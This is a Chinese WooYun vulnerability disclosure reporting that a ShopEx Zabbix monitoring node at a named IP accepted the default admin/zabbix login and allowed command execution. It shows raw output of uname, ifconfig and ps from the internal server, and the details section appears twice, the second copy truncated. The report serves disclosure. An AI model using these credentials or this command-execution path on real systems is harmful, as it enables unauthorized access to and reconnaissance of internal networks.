当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093016

漏洞标题:ShopEx某zabbix节点弱口令,导致命令执行(可入内网)

相关厂商:ShopEx

漏洞作者: 路人甲

提交时间:2015-01-20 22:53

修复时间:2015-03-06 22:54

公开时间:2015-03-06 22:54

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-20: 细节已通知厂商并且等待厂商处理中
2015-01-21: 厂商已经确认,细节仅向厂商公开
2015-01-31: 细节向核心白帽子及相关领域专家公开
2015-02-10: 细节向普通白帽子公开
2015-02-20: 细节向实习白帽子公开
2015-03-06: 细节向公众公开

简要描述:

国内少见,还在坚持使用zabbix node做为分布式监控。

详细说明:

#1
站点:http://202.108.13.148/
默认账号:admin
默认口令:zabbix
#2
使用node节点模式,建立一个层次结构的分布式监控。每一个节点是一个完整的zabbix服务器,和负责监视它自己的位置,zabbx支持高达一千个节点的分布式安装。

11.jpg


使用node节点的好处:
1、在大型的网络中,涉及多个地点建立一个多层次的监控,在层次结构中的节点会将监控的数据传输给其主节点。
2、一个节点可以在本地配置或通过拥有所有节点配置的主节点配置。
3、数据收集将变得更加可靠。如果主节点和子节点之间的通信发生故障时,节点可以保持正常运行状态,采集的数据信息和事件将存储在本地。当主节点和子节点的连接恢复时,子节点将有选择地将数据发送到主节点。
4、节点可以脱离成一个单一的zabbix服务器的工作,能独立监视数千台主机。
新节点的添加和删除,不影响现有节点的配置。无需重新启动所需的任何节点。
5、但是zabbix官网已在最新版本的2.4.x中不再支持Node分布式,转而大力支持Server--Proxy分布式方式,也已成为国内外的分布式监控主流。
#3

10.jpg


命令执行:

12.jpg


Linux tsung 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
eth0      Link encap:Ethernet  HWaddr 5C:F3:FC:E6:67:DC  
          inet addr:192.168.8.17  Bcast:192.168.8.255  Mask:255.255.255.0
          inet6 addr: fe80::5ef3:fcff:fee6:67dc/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7037072758 errors:0 dropped:81 overruns:0 frame:0
          TX packets:6895316171 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:879919283899 (819.4 GiB)  TX bytes:530615890165 (494.1 GiB)
          Interrupt:169 Memory:92000000-92012800 
eth1      Link encap:Ethernet  HWaddr 5C:F3:FC:E6:67:DE  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:114 Memory:94000000-94012800 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1598692172 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1598692172 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:101267278193 (94.3 GiB)  TX bytes:101267278193 (94.3 GiB)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
usb0      Link encap:Ethernet  HWaddr 5E:F3:FC:DE:67:DF  
          inet addr:169.254.95.120  Bcast:169.254.95.255  Mask:255.255.255.0
          inet6 addr: fe80::5cf3:fcff:fede:67df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37061848 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18561925 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2503136145 (2.3 GiB)  TX bytes:883141024 (842.2 MiB)
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2012 ?        00:02:48 init [3]         
root         2     1  0  2012 ?        00:00:00 [migration/0]
root         3     1  0  2012 ?        00:00:04 [ksoftirqd/0]
root         4     1  0  2012 ?        00:00:00 [watchdog/0]
root         5     1  0  2012 ?        00:04:33 [migration/1]
root         6     1  0  2012 ?        00:00:08 [ksoftirqd/1]
root         7     1  0  2012 ?        00:00:00 [watchdog/1]
root         8     1  0  2012 ?        00:03:23 [migration/2]
root         9     1  0  2012 ?        00:05:37 [ksoftirqd/2]
root        10     1  0  2012 ?        00:00:00 [watchdog/2]
root        11     1  0  2012 ?        00:03:02 [migration/3]
root        12     1  0  2012 ?        00:06:16 [ksoftirqd/3]
root        13     1  0  2012 ?        00:00:00 [watchdog/3]
root        14     1  0  2012 ?        00:00:02 [events/0]
root        15     1  0  2012 ?        00:00:02 [events/1]
root        16     1  0  2012 ?        00:00:03 [events/2]
root        17     1  0  2012 ?        00:00:03 [events/3]
root        18     1  0  2012 ?        00:00:00 [khelper]
root        99     1  0  2012 ?        00:00:00 [kthread]
root       106    99  0  2012 ?        00:00:09 [kblockd/0]
root       107    99  0  2012 ?        00:05:52 [kblockd/1]
root       108    99  0  2012 ?        00:12:08 [kblockd/2]
root       109    99  0  2012 ?        00:12:50 [kblockd/3]
root       110    99  0  2012 ?        00:00:00 [kacpid]
root       253    99  0  2012 ?        00:00:00 [cqueue/0]
root       254    99  0  2012 ?        00:00:00 [cqueue/1]
root       255    99  0  2012 ?        00:00:00 [cqueue/2]
root       256    99  0  2012 ?        00:00:00 [cqueue/3]
root       259    99  0  2012 ?        00:00:00 [khubd]
root       261    99  0  2012 ?        00:00:00 [kseriod]
zabbix     301     1  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     303   301  0  2014 ?        00:29:11 /usr/local/zabbix2/sbin/zabbix_server
zabbix     304   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     305   301  0  2014 ?        01:46:05 /usr/local/zabbix2/sbin/zabbix_server
zabbix     306   301  0  2014 ?        01:45:56 /usr/local/zabbix2/sbin/zabbix_server
zabbix     307   301  0  2014 ?        01:45:52 /usr/local/zabbix2/sbin/zabbix_server
zabbix     308   301  0  2014 ?        01:45:49 /usr/local/zabbix2/sbin/zabbix_server
zabbix     309   301  0  2014 ?        01:46:04 /usr/local/zabbix2/sbin/zabbix_server
zabbix     310   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     311   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     312   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     313   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     314   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     316   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     317   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     320   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     321   301  0  2014 ?        00:01:16 /usr/local/zabbix2/sbin/zabbix_server
zabbix     323   301  0  2014 ?        00:34:23 /usr/local/zabbix2/sbin/zabbix_server
zabbix     325   301  0  2014 ?        00:00:45 /usr/local/zabbix2/sbin/zabbix_server
zabbix     327   301  0  2014 ?        00:00:02 /usr/local/zabbix2/sbin/zabbix_server
zabbix     329   301  0  2014 ?        00:20:26 /usr/local/zabbix2/sbin/zabbix_server
zabbix     330   301  0  2014 ?        00:20:12 /usr/local/zabbix2/sbin/zabbix_server
zabbix     332   301  0  2014 ?        00:20:17 /usr/local/zabbix2/sbin/zabbix_server
zabbix     334   301  0  2014 ?        00:20:14 /usr/local/zabbix2/sbin/zabbix_server
zabbix     336   301  0  2014 ?        00:00:01 /usr/local/zabbix2/sbin/zabbix_server
zabbix     339   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     340   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
root       354    99  0  2012 ?        00:00:00 [khungtaskd]
root       357    99  0  2012 ?        01:52:21 [kswapd0]
root       358    99  0  2012 ?        00:00:00 [aio/0]
root       359    99  0  2012 ?        00:00:00 [aio/1]
root       360    99  0  2012 ?        00:00:00 [aio/2]
root       361    99  0  2012 ?        00:00:00 [aio/3]
root       516    99  0  2012 ?        00:00:00 [kpsmoused]
root       563    99  0  2012 ?        00:00:00 [scsi_eh_0]
root       574    99  0  2012 ?        00:00:00 [ata/0]
root       575    99  0  2012 ?        00:00:00 [ata/1]
root       576    99  0  2012 ?        00:00:00 [ata/2]
root       577    99  0  2012 ?        00:00:00 [ata/3]
root       578    99  0  2012 ?        00:00:00 [ata_aux]
root       584    99  0  2012 ?        00:00:00 [scsi_eh_1]
root       585    99  0  2012 ?        00:00:00 [scsi_eh_2]
root       586    99  0  2012 ?        00:00:00 [scsi_eh_3]
root       587    99  0  2012 ?        00:00:00 [scsi_eh_4]
root       603    99  0  2012 ?        00:00:00 [kstriped]
root       624    99  0  2012 ?        2-00:42:38 [kjournald]
root       649    99  0  2012 ?        00:00:47 [kauditd]
root      1304     1  0  2014 ?        00:00:00 /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data/ --pid-file=/tmp/mysql.pid
mysql     1515  1304  5  2014 ?        14-11:51:55 /usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql --log-error=/usr/local/mysql/data//tsung.err --pid-file=/tmp/mysql.pid --socket=/tmp/mysql.sock --port=3306
root      1856    99  0  2012 ?        00:00:00 [kmpathd/0]
root      1857    99  0  2012 ?        00:00:00 [kmpathd/1]
root      1858    99  0  2012 ?        00:00:00 [kmpathd/2]
root      1859    99  0  2012 ?        00:00:00 [kmpathd/3]
root      1860    99  0  2012 ?        00:00:00 [kmpath_handlerd]
root      1926    99  0  2012 ?        00:00:00 [kjournald]
root      2115    99  0  2012 ?        00:05:34 [kjournald]
root      2584     1  0  2012 ?        00:01:32 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient-usb0.leases -pf /var/run/dhclient-usb0.pid usb0
root      2667     1  0  2012 ?        04:25:00 syslogd -m 0
root      2670     1  0  2012 ?        00:00:00 klogd -x
root      2725    99  0  2012 ?        00:00:00 [kondemand/0]
root      2726    99  0  2012 ?        00:00:00 [kondemand/1]
root      2727    99  0  2012 ?        00:00:02 [kondemand/2]
root      2728    99  0  2012 ?        00:00:03 [kondemand/3]
root      2745     1  0  2012 ?        00:11:36 irqbalance
rpc       2765     1  0  2012 ?        00:00:00 portmap
root      2798    99  0  2012 ?        00:00:00 [rpciod/0]
root      2799    99  0  2012 ?        00:00:00 [rpciod/1]
root      2800    99  0  2012 ?        00:00:00 [rpciod/2]
root      2801    99  0  2012 ?        00:00:00 [rpciod/3]
dbus      2866     1  0  2012 ?        00:07:15 dbus-daemon --system
root      2889     1  0  2012 ?        00:00:00 /usr/sbin/hcid
root      2893     1  0  2012 ?        00:00:00 /usr/sbin/sdpd
root      2924     1  0  2012 ?        00:00:00 [krfcommd]
root      2984     1  0  2012 ?        00:00:00 /usr/sbin/acpid
68        2997     1  0  2012 ?        00:00:05 hald
root      2998  2997  0  2012 ?        00:00:00 hald-runner
68        3006  2998  0  2012 ?        00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
root      3037     1  0  2012 ?        00:00:00 /usr/bin/hidd --server
root      3148     1  0  2012 ?        00:00:00 gpm -m /dev/input/mice -t exps2
root      3163     1  0  2012 ?        00:01:15 crond
xfs       3192     1  0  2012 ?        00:00:00 xfs -droppriv -daemon
root      3217     1  0  2012 ?        00:00:00 /usr/sbin/atd
root      3272     1  0  2012 ?        00:00:00 /usr/sbin/smartd -q never
root      3275     1  0  2012 tty1     00:00:00 /sbin/mingetty tty1
root      3276     1  0  2012 tty2     00:00:00 /sbin/mingetty tty2
root      3277     1  0  2012 tty3     00:00:00 /sbin/mingetty tty3
root      3280     1  0  2012 tty4     00:00:00 /sbin/mingetty tty4
root      3281     1  0  2012 tty5     00:00:00 /sbin/mingetty tty5
root      3286     1  0  2012 tty6     00:00:00 /sbin/mingetty tty6
root      3331     1  0  2012 ?        00:39:34 /usr/bin/python -tt /usr/sbin/yum-updatesd
root      3333     1  0  2012 ?        00:00:07 /usr/libexec/gam_server
root      7190 20289  1 22:04 ?        00:00:04 sendmail: ./t0J94UmK006337 from queue
root      7265  3163  0 22:09 ?        00:00:00 crond
root      7266  7265  0 22:09 ?        00:00:00 [ntpdate] <defunct>
root      7267  7265  0 22:09 ?        00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
root      7270     1  0 22:09 ?        00:00:00 sendmail: ./t0KE95BR007268 man001.localdomain.: user open
zabbix    7272   316  0 22:09 ?        00:00:00 sh -c uname -a && ifconfig -a &&ps -ef
zabbix    7275  7272  0 22:09 ?        00:00:00 ps -ef
root      8886     1  0  2014 ?        00:00:00 SCREEN -S awstats
root      8887  8886  0  2014 pts/4    00:00:00 /bin/bash
zabbix   13537     1  0  2014 ?        00:00:00 /bin/sh -i
root     16102    99  0  2014 ?        00:01:46 [pdflush]
root     16851     1  0  2012 ?        00:00:00 /sbin/udevd -d
www      19090 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19091 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19092 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
www      19098 26259  0 04:05 ?        00:00:00 nginx: worker process                                          
zabbix   19913     1  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19914 19913  0  2014 ?        00:00:48 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19915 19913  0  2014 ?        00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19916 19913  0  2014 ?        00:09:53 /usr/local/zabbix2/sbin/zabbix_agentd
zabbix   19918 19913  0  2014 ?        00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd
root     20289     1  0  2012 ?        00:15:05 sendmail: accepting connections
smmsp    20297     1  0  2012 ?        00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root     20338     1  0  2012 ?        01:19:29 auditd
root     20340 20338  0  2012 ?        00:08:56 /sbin/audispd
root     20587     1  0  2012 ?        00:10:08 /usr/sbin/sshd
root     20613     1  0  2012 ?        00:03:27 pcscd
root     20682     1  0  2012 ?        00:00:00 rpc.idmapd
rpcuser  20735     1  0  2012 ?        00:00:00 rpc.statd
root     20952     1  0  2012 ?        00:00:05 automount
root     20990     1  0  2012 ?        00:00:00 cupsd
avahi    21064     1  0  2012 ?        00:00:03 avahi-daemon: running [lenovo-man001.local]
avahi    21065 21064  0  2012 ?        00:00:00 avahi-daemon: chroot helper
root     21444     1  0  2012 ?        00:00:00 /usr/local/lib/erlang/erts-5.7.2/bin/epmd -daemon
root     26259     1  0  2014 ?        00:00:01 nginx: master process /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
www      27821     1  0  2012 ?        00:00:02 /usr/local/memcached/bin/memcached -d -m 64 -uwww -p 11211
root     28668    99  0  2014 ?        00:01:01 [pdflush]
root     29312     1  0  2014 ?        00:00:06 php-fpm: master process (/usr/local/php/etc/php-fpm.conf)               
www      29313 29312  0  2014 ?        00:05:57 php-fpm: pool www                                                       
www      29314 29312  0  2014 ?        00:05:54 php-fpm: pool www                                                       
www      29315 29312  0  2014 ?        00:05:55 php-fpm: pool www                                                       
www      29316 29312  0  2014 ?        00:06:07 php-fpm: pool www                                                       
www      29317 29312  0  2014 ?        00:06:06 php-fpm: pool www                                                       
www      29318 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29319 29312  0  2014 ?        00:05:48 php-fpm: pool www                                                       
www      29320 29312  0  2014 ?        00:05:51 php-fpm: pool www                                                       
www      29321 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29322 29312  0  2014 ?        00:05:52 php-fpm: pool www                                                       
www      29323 29312  0  2014 ?        00:06:01 php-fpm: pool www                                                       
www      29324 29312  0  2014 ?        00:05:48 php-fpm: pool www                                                       
www      29325 29312  0  2014 ?        00:05:52 php-fpm: pool www                                                       
www      29326 29312  0  2014 ?        00:06:04 php-fpm: pool www                                                       
www      29327 29312  0  2014 ?        00:05:51 php-fpm: pool www                                                       
www      29328 29312  0  2014 ?        00:05:58 php-fpm: pool www                                                       
www      29329 29312  0  2014 ?        00:05:55 php-fpm: pool www                                                       
www      29330 29312  0  2014 ?        00:06:01 php-fpm: pool www                                                       
www      29331 29312  0  2014 ?        00:05:46 php-fpm: pool www                                                       
www      29332 29312  0  2014 ?        00:05:53 php-fpm: pool www                                                       
root     30862     1  0  2012 ?        01:39:45 /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a
zabbix   31513     1  0  2014 ?        00:00:00 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31515 31513  0  2014 ?        00:23:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31516 31513  0  2014 ?        00:00:31 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31517 31513  0  2014 ?        08:59:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31518 31513  0  2014 ?        00:09:46 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31519 31513  0  2014 ?        00:00:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31520 31513  0  2014 ?        01:35:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31521 31513  0  2014 ?        02:15:26 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31522 31513  0  2014 ?        00:04:27 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31523 31513  0  2014 ?        00:05:55 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31524 31513  0  2014 ?        00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31525 31513  0  2014 ?        00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31526 31513  0  2014 ?        00:05:51 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31527 31513  0  2014 ?        00:05:53 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31529 31513  0  2014 ?        00:00:47 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31530 31513  0  2014 ?        00:00:03 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31533 31513  0  2014 ?        04:10:50 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31534 31513  0  2014 ?        00:20:52 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31535 31513  0  2014 ?        1-14:44:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31538 31513  0  2014 ?        00:08:15 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31542 31513  0  2014 ?        00:00:28 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31543 31513  0  2014 ?        02:13:29 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31544 31513  0  2014 ?        02:13:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31546 31513  0  2014 ?        02:13:37 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31548 31513  0  2014 ?        02:14:10 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31549 31513  0  2014 ?        00:02:09 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31550 31513  0  2014 ?        00:00:23 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf
zabbix   31551 31513  0  2014 ?        00:00:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf

漏洞证明:

#1
站点:http://202.108.13.148/
默认账号:admin
默认口令:zabbix
#2
使用node节点模式,建立一个层次结构的分布式监控。每一个节点是一个完整的zabbix服务器,和负责监视它自己的位置,zabbx支持高达一千个节点的分布式安装。

11.jpg


使用node节点的好处:
1、在大型的网络中,涉及多个地点建立一个多层次的监控,在层次结构中的节点会将监控的数据传输给其主节点。
2、一个节点可以在本地配置或通过拥有所有节点配置的主节点配置。
3、数据收集将变得更加可靠。如果主节点和子节点之间的通信发生故障时,节点可以保持正常运行状态,采集的数据信息和事件将存储在本地。当主节点和子节点的连接恢复时,子节点将有选择地将数据发送到主节点。
4、节点可以脱离成一个单一的zabbix服务器的工作,能独立监视数千台主机。
新节点的添加和删除,不影响现有节点的配置。无需重新启动所需的任何节点。
5、但是zabbix官网已在最新版本的2.4.x中不再支持Node分布式,转而大力支持Server--Proxy分布式方式,也已成为国内外的分布式监控主流。
#3

10.jpg


命令执行:

12.jpg


Linux tsung 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
eth0      Link encap:Ethernet  HWaddr 5C:F3:FC:E6:67:DC  
          inet addr:192.168.8.17  Bcast:192.168.8.255  Mask:255.255.255.0
          inet6 addr: fe80::5ef3:fcff:fee6:67dc/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7037072758 errors:0 dropped:81 overruns:0 frame:0
          TX packets:6895316171 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:879919283899 (819.4 GiB)  TX bytes:530615890165 (494.1 GiB)
          Interrupt:169 Memory:92000000-92012800 
eth1      Link encap:Ethernet  HWaddr 5C:F3:FC:E6:67:DE  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:114 Memory:94000000-94012800 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1598692172 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1598692172 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:101267278193 (94.3 GiB)  TX bytes:101267278193 (94.3 GiB)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
usb0      Link encap:Ethernet  HWaddr 5E:F3:FC:DE:67:DF  
          inet addr:169.254.95.120  Bcast:169.254.95.255  Mask:255.255.255.0
          inet6 addr: fe80::5cf3:fcff:fede:67df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:37061848 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18561925 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2503136145 (2.3 GiB)  TX bytes:883141024 (842.2 MiB)
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2012 ?        00:02:48 init [3]         
root         2     1  0  2012 ?        00:00:00 [migration/0]
root         3     1  0  2012 ?        00:00:04 [ksoftirqd/0]
root         4     1  0  2012 ?        00:00:00 [watchdog/0]
root         5     1  0  2012 ?        00:04:33 [migration/1]
root         6     1  0  2012 ?        00:00:08 [ksoftirqd/1]
root         7     1  0  2012 ?        00:00:00 [watchdog/1]
root         8     1  0  2012 ?        00:03:23 [migration/2]
root         9     1  0  2012 ?        00:05:37 [ksoftirqd/2]
root        10     1  0  2012 ?        00:00:00 [watchdog/2]
root        11     1  0  2012 ?        00:03:02 [migration/3]
root        12     1  0  2012 ?        00:06:16 [ksoftirqd/3]
root        13     1  0  2012 ?        00:00:00 [watchdog/3]
root        14     1  0  2012 ?        00:00:02 [events/0]
root        15     1  0  2012 ?        00:00:02 [events/1]
root        16     1  0  2012 ?        00:00:03 [events/2]
root        17     1  0  2012 ?        00:00:03 [events/3]
root        18     1  0  2012 ?        00:00:00 [khelper]
root        99     1  0  2012 ?        00:00:00 [kthread]
root       106    99  0  2012 ?        00:00:09 [kblockd/0]
root       107    99  0  2012 ?        00:05:52 [kblockd/1]
root       108    99  0  2012 ?        00:12:08 [kblockd/2]
root       109    99  0  2012 ?        00:12:50 [kblockd/3]
root       110    99  0  2012 ?        00:00:00 [kacpid]
root       253    99  0  2012 ?        00:00:00 [cqueue/0]
root       254    99  0  2012 ?        00:00:00 [cqueue/1]
root       255    99  0  2012 ?        00:00:00 [cqueue/2]
root       256    99  0  2012 ?        00:00:00 [cqueue/3]
root       259    99  0  2012 ?        00:00:00 [khubd]
root       261    99  0  2012 ?        00:00:00 [kseriod]
zabbix     301     1  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     303   301  0  2014 ?        00:29:11 /usr/local/zabbix2/sbin/zabbix_server
zabbix     304   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     305   301  0  2014 ?        01:46:05 /usr/local/zabbix2/sbin/zabbix_server
zabbix     306   301  0  2014 ?        01:45:56 /usr/local/zabbix2/sbin/zabbix_server
zabbix     307   301  0  2014 ?        01:45:52 /usr/local/zabbix2/sbin/zabbix_server
zabbix     308   301  0  2014 ?        01:45:49 /usr/local/zabbix2/sbin/zabbix_server
zabbix     309   301  0  2014 ?        01:46:04 /usr/local/zabbix2/sbin/zabbix_server
zabbix     310   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     311   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     312   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     313   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     314   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     316   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     317   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     320   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     321   301  0  2014 ?        00:01:16 /usr/local/zabbix2/sbin/zabbix_server
zabbix     323   301  0  2014 ?        00:34:23 /usr/local/zabbix2/sbin/zabbix_server
zabbix     325   301  0  2014 ?        00:00:45 /usr/local/zabbix2/sbin/zabbix_server
zabbix     327   301  0  2014 ?        00:00:02 /usr/local/zabbix2/sbin/zabbix_server
zabbix     329   301  0  2014 ?        00:20:26 /usr/local/zabbix2/sbin/zabbix_server
zabbix     330   301  0  2014 ?        00:20:12 /usr/local/zabbix2/sbin/zabbix_server
zabbix     332   301  0  2014 ?        00:20:17 /usr/local/zabbix2/sbin/zabbix_server
zabbix     334   301  0  2014 ?        00:20:14 /usr/local/zabbix2/sbin/zabbix_server
zabbix     336   301  0  2014 ?        00:00:01 /usr/local/zabbix2/sbin/zabbix_server
zabbix     339   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
zabbix     340   301  0  2014 ?        00:00:00 /usr/local/zabbix2/sbin/zabbix_server
root       354    99  0  2012 ?        00:00:00 [khungtaskd]
root       357    99  0  2012 ?        01:52:21 [kswapd0]
root       358    99  0  2012 ?        00:00:00 [aio/0]
root       359    99  0  2012 ?        00:00:00 [aio/1]
root       360    99  0  2012 ?        00:00:00 [aio/2]
root       361    99  0  2012 ?        00:00:00 [aio/3]
root       516    99  0  2012 ?        00:00:00 [kpsmoused]
root       563    99  0  2012 ?        00:00:00 [scsi_eh_0]
root       574    99  0  2012 ?        00:00:00 [ata/0]
root       575    99  0  2012 ?        00:00:00 [ata/1]
root       576    99  0  2012 ?        00:00:00 [ata/2]
root       577    99  0  2012 ?        00:00:00 [ata/3]
root       578    99  0  2012 ?        00:00:00 [ata_aux]
root       584    99  0  2012 ?        00:00:00 [scsi_eh_1]
root       585    99  0  2012 ?        00:00:00 [scsi_eh_2]
root       586    99  0  2012 ?        00:00:00 [scsi_eh_3]
root       587    99  0  2012 ?        00:00:00 [scsi_eh_4]
root       603    99  0  2012 ?        00:00:00 [kstriped]
root       624    99  0  2012 ?        2-00:42:38 [kjournald]
